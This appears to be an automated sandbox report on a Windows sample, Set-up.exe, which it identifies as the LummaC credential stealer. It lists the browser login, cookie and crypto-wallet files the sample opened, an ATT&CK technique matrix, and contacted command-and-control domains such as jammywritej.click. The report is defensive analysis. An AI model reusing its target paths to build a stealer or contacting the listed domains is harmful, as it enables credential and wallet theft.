Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 5356, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2911165920.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	16%	ReversingLabs
Set-up.exe	17%	Virustotal		Browse

Source	Detection	Scanner	Label
https://jammywritej.click/api02Vu	0%	Avira URL Cloud	safe
https://jammywritej.click/api	0%	Avira URL Cloud	safe
jammywritej.click	0%	Avira URL Cloud	safe
https://jammywritej.click/V	0%	Avira URL Cloud	safe
https://jammywritej.click/apie	0%	Avira URL Cloud	safe
http://www.dposoft.net0	0%	Avira URL Cloud	safe
https://jammywritej.click/&	0%	Avira URL Cloud	safe
https://jammywritej.click/U	0%	Avira URL Cloud	safe
https://jammywritej.click/:&Ut-	0%	Avira URL Cloud	safe
https://jammywritej.click/	0%	Avira URL Cloud	safe
https://jammywritej.click/wTAAA=	0%	Avira URL Cloud	safe
https://jammywritej.click/pi	0%	Avira URL Cloud	safe
https://jammywritej.click/f	0%	Avira URL Cloud	safe
https://jammywritej.click/apiN	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jammywritej.click	104.21.87.112	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
hummskitnj.buzz	false		high
jammywritej.click	true	Avira URL Cloud: safe	unknown
https://jammywritej.click/api	true	Avira URL Cloud: safe	unknown
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.dposoft.net0	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Set-up.exe, 00000000.00000003.1827113561.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850736184.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850623615.00000000147A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/api02Vu	Set-up.exe, 00000000.00000003.1981747629.0000000001D43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jammywritej.click/	Set-up.exe, 00000000.00000003.1902853656.0000000001D7D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1923838942.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1942303556.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D9F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1903381866.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Set-up.exe	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Set-up.exe, 00000000.00000003.1827113561.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/&	Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Set-up.exe, 00000000.00000003.1876017378.000000001475D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	Set-up.exe	false		high
https://jammywritej.click/U	Set-up.exe, 00000000.00000002.2910980842.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jammywritej.click/V	Set-up.exe, 00000000.00000003.1942303556.0000000001D94000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1979580618.0000000001D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Set-up.exe, 00000000.00000003.1874679451.0000000014782000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Set-up.exe, 00000000.00000003.1827113561.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850736184.00000000147A7000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826958372.00000000147F3000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850623615.00000000147A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/:&Ut-	Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Set-up.exe, 00000000.00000003.1875666610.000000001487C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jammywritej.click/apie	Set-up.exe, 00000000.00000003.1850656272.0000000014760000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851313938.0000000014761000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1850529822.0000000014760000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851104729.0000000014761000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.1826515724.000000001479B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1826608794.0000000014798000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	Set-up.exe, 00000000.00000003.1825591658.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	false		high
